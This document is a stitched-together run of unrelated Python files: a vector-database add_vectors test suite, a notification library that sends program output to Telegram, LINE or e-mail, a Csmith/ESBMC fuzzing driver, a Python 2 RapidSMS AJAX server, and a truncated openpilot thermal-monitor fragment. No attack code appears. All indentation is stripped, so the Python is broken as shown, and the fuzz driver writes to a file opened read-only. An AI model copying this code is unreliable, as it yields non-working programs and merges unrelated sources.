expected: the length of ids and the collection row count both equal the number of vectors added
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
connect.flush([ip_collection])
assert len(ids) == nq
# check search result
status, result = connect.search_vectors(ip_collection, top_k, vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, ip_collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for i in range(nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, ip_collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count both equal the number of vectors added
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
assert len(ids) == nq
# @pytest.mark.level(2)
# def test_add_vectors_without_connect(self, dis_connect, ip_collection):
# '''
# target: test add vectors without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nq = 5
# vectors = gen_vectors(nq, dim)
# with pytest.raises(Exception) as e:
# status, ids = dis_connect.add_vectors(ip_collection, vectors)
def test_add_vector_dim_not_matched(self, connect, ip_collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, ip_collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, ip_collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of IP
method: create 20 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
for j in range(10):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddAdvance:
@pytest.fixture(
scope="function",
params=[
1,
1000,
6000
],
)
def insert_count(self, request):
yield request.param
def test_insert_much(self, connect, collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_ip(self, connect, ip_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(ip_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_jaccard(self, connect, jac_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_hamming(self, connect, ham_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(ham_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_tanimoto(self, connect, tanimoto_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(tanimoto_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
class TestNameInvalid(object):
"""
Test adding vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors)
assert not status.OK()
@pytest.mark.level(2)
def test_add_vectors_with_invalid_tag_name(self, connect, get_collection_name, get_tag_name):
collection_name = get_collection_name
tag_name = get_tag_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors, partition_tag=tag_name)
assert not status.OK()
class TestAddCollectionVectorsInvalid(object):
single_vector = gen_single_vector(dim)
vectors = gen_vectors(2, dim)
"""
Test adding vectors with invalid vectors
"""
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def gen_vector(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vector_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_single_vector = copy.deepcopy(self.single_vector)
tmp_single_vector[0][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_single_vector)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_jaccard(self, connect, jac_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(jac_collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_hamming(self, connect, ham_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(ham_collection, tmp_vectors)
|
__init__.py
|
"""
doc string
"""
# pylint: disable=fixme
from email.header import Header
from email.mime.text import MIMEText
from datetime import datetime
import io
import json
import logging
import os
import re
import shutil
import smtplib
import sys
import time
import threading
import traceback
import queue
import requests
import yaml
VERSION = '0.9.5.1'
HINTED = False
def load_config(channel, conf_path='~/.busm.yaml'):
"""
doc string
"""
# pylint: disable=global-statement
global HINTED
conf_path = os.path.expanduser(conf_path)
if not os.path.isfile(conf_path):
tmpl_path = os.path.dirname(__file__) + '/conf/busm.yaml'
shutil.copy(tmpl_path, conf_path)
with open(conf_path, 'r', encoding='utf-8') as f_conf:
# TODO: Syntax errors are easy to hit here; the exception handling needs improvement.
conf = yaml.load(f_conf, Loader=yaml.SafeLoader)[channel]
if channel == 'smtp' and \
conf['from_email'] != 'someone@gmail.com':
return conf
if channel == 'telegram' and \
conf['token'] != '123456789:-----------------------------------':
return conf
if channel == 'line' and conf['token'] != '':
return conf
if not HINTED:
print('-' * 65)
print(' Please change busm config file (%s) to enable.' % conf_path)
print('-' * 65)
os.system('open -t %s' % conf_path) # TODO: Limit Darwin only.
HINTED = True
return None
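# Hedged sketch of the ~/.busm.yaml layout (keys inferred from the lookups in this module;
# every value below is a placeholder, not a real credential):
#
#     smtp:
#       host: smtp.example.com
#       port: 587
#       user: someone
#       pass: secret
#       from_name: busm
#       from_email: someone@gmail.com
#       to_name: me
#       to_email: me@example.com
#     telegram:
#       token: 123456789:-----------------------------------
#       master: 123456789
#     line:
#       token: ''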
def gl_pre_task(state):
"""
doc string
"""
state['conf'] = load_config(state['channel'])
if state['conf'] is not None:
state['begin'] = time.time()
sys.stdout = io.StringIO()
def gl_post_task(state):
"""
doc string
"""
if state['conf'] is not None:
# Print exc_info
if state['exc_val'] is not None:
print('')
typename = state['exc_type'].__name__
print('Found an exception "%s" (%s) at:' % (state['exc_val'], typename))
stack = traceback.extract_tb(state['exc_tb'])
stack.reverse()
indent_level = 1
for frm in stack:
if frm.filename.startswith(os.getcwd()):
filename = frm.filename[len(os.getcwd()) + 1:]
else:
filename = frm.filename
print(' ' * indent_level, end='')
print('%s (%s:%s)' % (frm.line, filename, frm.lineno))
indent_level += 1
# Retrieve stdout.
state['stdout'] = sys.stdout.getvalue().strip()
sys.stdout.close()
sys.stdout = sys.__stdout__
# Retrieve execution time.
state['elapsed'] = time.time() - state['begin']
# Default subject
if state['subject'] == '':
state['subject'] = '{}() executed.'.format(state['func'].__name__)
# Send to target channel
if state['channel'] == 'telegram':
telegram_send_message(
state['conf'], state['subject'],
state['stdout'], state['elapsed']
)
elif state['channel'] == 'line':
line_send_message(
state['conf'], state['subject'],
state['stdout'], state['elapsed']
)
elif state['channel'] == 'smtp':
smtp_send_message(
state['conf'], state['subject'],
state['stdout'], state['elapsed'], state['debug']
)
def telegram_send_message(conf, subject, detail, extime=-1):
"""
doc string
"""
# pylint: disable=bare-except
if extime == -1:
message = '*{}*\n```\n{}\n```'.format(subject, detail)
else:
message = '*{}* ({:.2f}s)\n```\n{}\n```'.format(subject, extime, detail)
api = 'https://api.telegram.org/bot{}/sendMessage'.format(conf['token'])
params = {
'chat_id': conf['master'],
'text': message,
'parse_mode': 'markdown',
'disable_web_page_preview': False
}
sent = False
retry = -1
while not sent and retry < 3:
try:
retry += 1
resp = requests.post(api, data=params)
if resp.headers['Content-Type'] == 'application/json':
result = resp.json()
if result['ok']:
sent = True
else:
# TODO: handle the case where the Telegram API responded with an error
# print(result['description'])
break
except:
# TODO: handle the case where the Telegram API did not respond
pass
def line_send_message(conf, subject, detail, extime=-1):
"""
    Send a message through LINE Notify, retrying up to three times on non-200 responses.
"""
if extime == -1:
message = '*{}*\n```{}```'.format(subject, detail)
else:
message = '*{}* ({:.2f}s)\n```{}```'.format(subject, extime, detail)
api = 'https://notify-api.line.me/api/notify'
params = {
'message': message
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Bearer {}'.format(conf['token'])
}
sent = False
retry = -1
while not sent and retry < 3:
resp = requests.post(api, data=params, headers=headers)
if resp.status_code != 200:
retry += 1
else:
sent = True
def smtp_send_message(conf, subject, detail, extime=-1, debug=False):
"""
    Compose an HTML e-mail from the captured output and send it over SMTP with STARTTLS.
"""
# Compose email
if extime == -1:
contents = re.sub(r'\s+\| ', '\n', '''
| <p>STDOUT:</p>
| <pre style="border:1px solid #aaa; border-radius:5px; background:#e7e7e7; padding:10px;">
| {}
| </pre>
| <p style="color: #d0d0d0;">Sent by busm {}</p>
''') \
.format(detail, VERSION)
else:
contents = re.sub(r'\s+\| ', '\n', '''
| <p>STDOUT:</p>
| <pre style="border:1px solid #aaa; border-radius:5px; background:#e7e7e7; padding:10px;">
| {}
| </pre>
| <ul style="padding: 5px">
| <li>Execution time: {:.2f}</li>
| </ul>
| <p style="color: #d0d0d0;">Sent by busm {}</p>
''') \
.format(detail, extime, VERSION)
msg = MIMEText(contents, 'html', 'utf-8')
msg['Subject'] = Header(subject)
msg['From'] = '{} <{}>'.format(Header(conf['from_name']).encode(), conf['from_email'])
msg['To'] = '{} <{}>'.format(Header(conf['to_name']).encode(), conf['to_email'])
smtp_message = msg.as_string()
# Send email
# pylint: disable=broad-except, singleton-comparison
try:
with smtplib.SMTP(conf['host'], conf['port'], timeout=30) as smtp:
if debug == True:
smtp.set_debuglevel(2)
smtp.starttls()
smtp.login(conf['user'], conf['pass'])
smtp.sendmail(conf['from_email'], conf['to_email'], smtp_message)
except Exception as ex:
print('Failed to send email.')
print(ex)
def through_smtp(func=None, subject='', debug=False):
"""
@busm.through_smtp
"""
state = {
'begin': 0,
'conf': None,
'func': None,
'subject': subject,
'debug': debug,
'channel': 'smtp',
'exc_type': None,
'exc_val': None,
'exc_tb': None
}
# @busm.through_smtp
def func_wrapper(*args):
# pylint: disable=not-callable, broad-except
nonlocal state
gl_pre_task(state)
try:
fret = state['func'](*args)
except Exception:
state['exc_type'], state['exc_val'], state['exc_tb'] = sys.exc_info()
fret = None
gl_post_task(state)
return fret
# @busm.through_smtp(subject='...')
def deco_wrapper(func):
nonlocal state
state['func'] = func
return func_wrapper
if callable(func):
state['func'] = func
return func_wrapper
return deco_wrapper
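# Illustrative usage of the decorators in this module (the function name and
# subject are made up for the example; actual delivery still depends on a
# valid channel config):
#
#   @through_smtp(subject='nightly report')
#   def nightly_job():
#       print('42 rows processed')  # stdout is captured and e-mailed on return
#
#   nightly_job()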
def through_telegram(func=None, subject=''):
"""
@busm.through_telegram
"""
state = {
'begin': 0,
'conf': None,
'func': None,
'subject': subject,
'channel': 'telegram',
'exc_type': None,
'exc_val': None,
'exc_tb': None
}
# @busm.through_telegram
def func_wrapper(*args):
# pylint: disable=not-callable, broad-except
nonlocal state
gl_pre_task(state)
try:
fret = state['func'](*args)
except Exception:
state['exc_type'], state['exc_val'], state['exc_tb'] = sys.exc_info()
fret = None
gl_post_task(state)
return fret
# @busm.through_telegram(subject='...')
def deco_wrapper(func):
nonlocal state
state['func'] = func
return func_wrapper
if callable(func):
state['func'] = func
return func_wrapper
return deco_wrapper
def through_line(func=None, subject=''):
"""
@busm.through_line
"""
state = {
'begin': 0,
'conf': None,
'func': None,
'subject': subject,
'channel': 'line',
'exc_type': None,
'exc_val': None,
'exc_tb': None
}
# @busm.through_line
def func_wrapper(*args):
# pylint: disable=not-callable, broad-except
nonlocal state
gl_pre_task(state)
try:
fret = state['func'](*args)
except Exception:
state['exc_type'], state['exc_val'], state['exc_tb'] = sys.exc_info()
fret = None
gl_post_task(state)
return fret
# @busm.through_line(subject='...')
def deco_wrapper(func):
nonlocal state
state['func'] = func
return func_wrapper
if callable(func):
state['func'] = func
return func_wrapper
return deco_wrapper
class BusmHandler(logging.Handler):
"""
    logging.Handler that buffers log records and forwards them in batches to Telegram or LINE Notify; a record whose message is '$' flushes the buffer immediately.
"""
# pylint: disable=too-many-instance-attributes
def __init__(self, channel='telegram', subject='', config=''):
super().__init__()
if config != '':
self.conf = load_config(channel, conf_path=config)
else:
self.conf = {}
self.channel = channel
self.subject = subject
self.queue = queue.Queue()
self.has_sender = False
def setup_telegram(self, token, master):
"""
setup token and master for telegram channel
"""
self.channel = 'telegram'
self.conf['token'] = token
self.conf['master'] = master
def setup_line(self, token):
"""
setup token for line channel
"""
self.channel = 'line'
self.conf['token'] = token
def emit(self, record):
pass
def handle(self, record):
if record.getMessage() == '$':
message = '$'
else:
message = self.format(record)
        # TODO: Improve thread-safety
        # TODO: If conf is empty, no sender thread starts, so queued messages
        # could grow without bound (OOM). A queue size limit may be necessary.
self.queue.put(message)
if not self.has_sender and self.conf != {}:
self.has_sender = True
threading.Thread(target=self.sender).start()
def sender(self):
"""
thread target to dequeue and send message
"""
begin = 0
collected = []
while self.queue.qsize() > 0 or collected:
while self.queue.qsize() > 0:
message = self.queue.get()
if message != '$':
if not collected:
begin = time.time()
collected.append(message)
else:
break
if collected:
duration = time.time() - begin
if duration > 1 or message == '$':
self.send('\n'.join(collected))
collected.clear()
self.has_sender = False
def send(self, buffered_message):
"""
send buffered message
"""
if self.channel == 'telegram':
telegram_send_message(self.conf, self.subject, buffered_message)
elif self.channel == 'line':
line_send_message(self.conf, self.subject, buffered_message)
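# Illustrative usage sketch (added for clarity; the logger name and token values
# are placeholders, not part of the original module): routing standard logging
# records through BusmHandler. A record whose message is '$' flushes the buffer.
def _example_handler_usage():
    handler = BusmHandler(channel='telegram', subject='job log')
    handler.setup_telegram(token='123456789:PLACEHOLDER', master='42')  # fake credentials
    logger = logging.getLogger('busm-demo')
    logger.addHandler(handler)
    logger.warning('step 1 finished')
    logger.warning('step 2 finished')
    logger.warning('$')  # sentinel: flush buffered messages immediately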
|
run_csmith.py
|
#!/usr/bin/env python3
import os.path
import sys
import subprocess
import tempfile
from multiprocessing import Process
import time
import shutil
class Csmith:
"""Wrapper for Csmith"""
def __init__(self, csmith: str, csmith_inc: str, csmith_args=""):
if not os.path.exists(csmith):
raise ValueError(f'{csmith} does not exist!')
if not os.path.exists(os.path.join(csmith_inc, "csmith.h")):
raise ValueError(f'{csmith_inc} does not contain csmith.h!')
self.csmith = csmith
self.csmith_inc = csmith_inc
self.csmith_args = csmith_args
def generate_c_file(self, output):
"""Run csmith using `args` and saving in `output`"""
cmd = f'{self.csmith} {self.csmith_args}'
cmd_out = subprocess.check_output(cmd.split()).decode()
with open(output, 'w') as f:
f.write(cmd_out)
class ESBMC:
"""Wrapper for ESBMC"""
def __init__(self, esbmc: str, esbmc_args=""):
if not os.path.exists(esbmc):
raise ValueError(f'{esbmc} does not exist!')
self.esbmc = esbmc
self.esbmc_args = esbmc_args
def run(self, csmith_inc, csmith_file="", timeout=10) -> int:
"""Run esbmc with `args` and return exit code"""
cmd = f'{self.esbmc} -I{csmith_inc} {csmith_file} {self.esbmc_args}'
try:
print("Running " + cmd)
ps = subprocess.run(cmd.split(), timeout=int(timeout), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print(ps)
return ps.returncode
except Exception as exception:
            print(exception.__class__.__name__)  # Expect to see TimeoutExpired
return 0
class Driver:
"""Main driver"""
def __init__(self, csmith: Csmith, esbmc: ESBMC, esbmc_timeout=10):
self.csmith = csmith
self.esbmc = esbmc
self.esbmc_timeout = esbmc_timeout
def _main(self):
if not os.path.exists('csmith-tests/'):
os.makedirs('csmith-tests')
counter = 0
while True:
counter = counter + 1
c_file = "csmith-tests/" + str(counter) + ".c"
# 1. Generate C file
self.csmith.generate_c_file(c_file)
# 2. Run ESBMC
res = self.esbmc.run(self.csmith.csmith_inc, c_file, self.esbmc_timeout)
# Check if an error was found
# FUTURE: For max-coverage we probably just have to remove this 'if'
if res != 0:
print("Found Error!")
if not os.path.exists('csmith-error/'):
os.makedirs('csmith-error')
shutil.copyfile(c_file, "csmith-error/error.c")
shutil.copyfile(os.path.join(self.csmith.csmith_inc, "csmith.h"), "csmith-error/csmith.h")
with open("csmith-error/desc") as f:
f.write(self.esbmc.esbmc_args)
f.write(res)
return
def run(self, timeout=100):
"""Start driver with defined timeout"""
ps = Process(target=self._main)
ps.start()
ps.join(timeout=int(timeout))
ps.terminate()
def main():
print("Running csmith over esbmc...")
csmith = sys.argv[1]
csmith_inc = sys.argv[2]
csmith_args = sys.argv[3]
esbmc = sys.argv[4]
esbmc_args = sys.argv[5]
esbmc_timeout = sys.argv[6]
driver_timeout = sys.argv[7]
csmith_obj = Csmith(csmith, csmith_inc, csmith_args)
esbmc_obj = ESBMC(esbmc, esbmc_args)
driver = Driver(csmith_obj, esbmc_obj, esbmc_timeout)
driver.run(driver_timeout)
print("Done")
if __name__ == "__main__":
main()
|
app.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import cgi
import urlparse
import traceback
from threading import Thread
from SocketServer import ThreadingMixIn
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from django.utils.simplejson import JSONEncoder
from django.db.models.query import QuerySet
from rapidsms.apps.base import AppBase
from rapidsms.conf import settings
class App(AppBase):
"""
This App does nothing by itself. It exists only to serve other Apps,
by providing an easy (and standard) way for them to communicate
between their WebUI and RapidSMS App object.
When RapidSMS starts, this app starts an HTTPServer (port 8001 as
default, but configurable via settings.py) in a worker thread, and
watches for any incoming HTTP requests matching */app/method*. These
requests, along with their GET parameters and POST data, are passed
on to the named app.
Examples::
method URL app method args
====== === === ====== ====
GET /food/toast food ajax_GET_toast { }
POST /food/waffles food ajax_POST_waffles { }, { }
POST /food/eggs?x=1 food ajax_POST_eggs { "x": [1] }, { }
Any data that is returned by the handler method is JSON encoded, and
sent back to the WebUI in response. Since RapidSMS includes jQuery
with every view, this makes it very easy for apps to query their
running App object for state. See the _httptester_ for an example.
But wait! AJAX can't cross domains, so a request to port 8001 from
the WebUI won't work! This is handled by the WebUI bundled with this
app, that proxies all requests to /ajax/(.+) to the right place, on
the server side. I cannot conceive of a situation where this would
be a problem - but keep it in mind, and don't forget to prepend
"/ajax/" to your AJAX URLs.
"""
class Server(ThreadingMixIn, HTTPServer):
pass
class MyJsonEncoder(JSONEncoder):
def default(self, o):
# if this object has its own JSON serializer, use it
if hasattr(o, "__json__"):
return o.__json__()
elif type(o) == QuerySet:
return list(o)
# otherwise, revert to the usual behavior
return JSONEncoder.default(self, o)
class RequestHandler(BaseHTTPRequestHandler):
def _find_app(self, name):
for app in self.server.app.router.apps:
if app.name == name:
return app
def _charset(self, str):
"""
Extract and return the charset argument from an HTTP
content-type header, or None if it was not found.
"""
x = str.split("charset=", 1)
return x[1] if(len(x) == 2) else None
# handle GET and POST with the same method
def do_GET(self): return self.process()
def do_POST(self): return self.process()
def process(self):
def response(code, output, json=True):
self.send_response(code)
mime_type = "application/json" if json else "text/plain"
self.send_header("content-type", mime_type)
self.end_headers()
if json:
json = App.MyJsonEncoder().encode(output)
self.wfile.write(json)
# otherwise, write the raw response. it doesn't make
# much sense to have error messages encoded as JSON.
else: self.wfile.write(output)
# HTTP2xx represents success
return (code>=200 and code <=299)
# should look something like:
# /alpha/bravo?charlie=delta
#
# this request will be parsed to the "bravo"
# method of the "alpha" app, with the params:
# { "charlie": ["delta"] }
#
# any other path format will return an http 404 error, for
# the time being. GET parameters are optional.
url = urlparse.urlparse(self.path)
path_parts = url.path.split("/")
# abort if the url didn't look right
if len(path_parts) != 3:
str_ = "Malformed URL: %s" % url
self.server.app.warning(str_)
return response(404, str_)
# resolve the first part of the url into an app (via the
# router), and abort if it wasn't valid
app_name = path_parts[1]
app = self._find_app(app_name)
if (app is None):
str_ = "Invalid app: %s" % app_name
self.server.app.warning(str_)
return response(404, str_)
# same for the request name within the app
meth_name = "ajax_%s_%s" % (self.command, path_parts[2])
if not hasattr(app, meth_name):
str_ = "Invalid method: %s.%s" %\
(app.__class__.__name__, meth_name)
self.server.app.warning(str_)
return response(404, str_)
# everything appears to be well, so call the target method,
# and return the response (as a string, for now)
try:
method = getattr(app, meth_name)
args = [cgi.parse_qs(url.query)]
# for post requests, we'll also need to parse the form
# data and hand it along to the method
if self.command == "POST":
content_type = self.headers["content-type"]
form = {}
# parse the form data via the CGI lib. this is a
# horrible mess, but supports all kinds of encodings
# that we may encounter. (multipart, in particular.)
storage = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ = {
"REQUEST_METHOD": "POST",
"CONTENT_TYPE": content_type })
# extract the charset from the content-type header,
# which should have been passed along in views.py
charset = self._charset(content_type)
# convert the fieldstorage object into a dict, to
# keep it simple for the handler methods. TODO: make
# this a util, if it's useful elsewhere.
for key in storage.keys():
# convert each of the values with this key into
# unicode, respecting the content-type that the
# request _claims_ to be currently encoded with
val = [
unicode(v, charset)
for v in storage.getlist(key)]
# where possible, store the values as singular,
# to avoid CGI's usual post["id"][0] verbosity
form[key] = val[0] if(len(val) == 1) else val
args.append(form)
self.server.app.debug(
"Calling %s.%s with args: %s" %
(app.__class__.__name__, meth_name, args))
output = method(*args)
self.server.app.debug("Response: %s" % output)
return response(200, output)
# something raised during the request, so return a useless
# http error to the requester
except Exception, err:
self.server.app.warning(traceback.format_exc())
return response(500, unicode(err), False)
# this does nothing, except prevent the incoming http requests
# from being echoed to the screen (which screws up the log)
def log_request(*args):
pass
def start(self):
# create the webserver, through which the AJAX requests from the
# WebUI will arrive (via utils.py)
self.server = self.Server((
settings.AJAX_PROXY_HOST,
settings.AJAX_PROXY_PORT),
self.RequestHandler)
# allow the server to call back the app
self.server.app = self
# start the server in a separate thread, and daemonize it to
# prevent it from hanging once the main thread terminates
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.kegman_kans_conf import kegman_kans_conf
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
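# Worked example of the band hysteresis above (illustrative numbers): starting in
# green, a filtered temperature of 85C exceeds green's max (80.0), so the status
# steps up to yellow; it only drops back to green once the temperature falls below
# yellow's min (75.0), and steps up to red once it exceeds yellow's max (96.0).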
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
# From the line below to the marked return: battery-charging enable/disable control
def check_car_battery_voltage(should_start, pandaStates, charging_disabled, msg):
sm = messaging.SubMaster(["pandaStates"])
sm.update(0)
pandaStates = sm['pandaStates']
if sm.updated['pandaStates']:
print(pandaStates)
kegman_kans = kegman_kans_conf()
if charging_disabled and (pandaStates is None) and msg.deviceState.batteryPercent < int(kegman_kans.conf['battChargeMin']):
charging_disabled = False
os.system('echo "1" > /sys/class/power_supply/battery/charging_enabled')
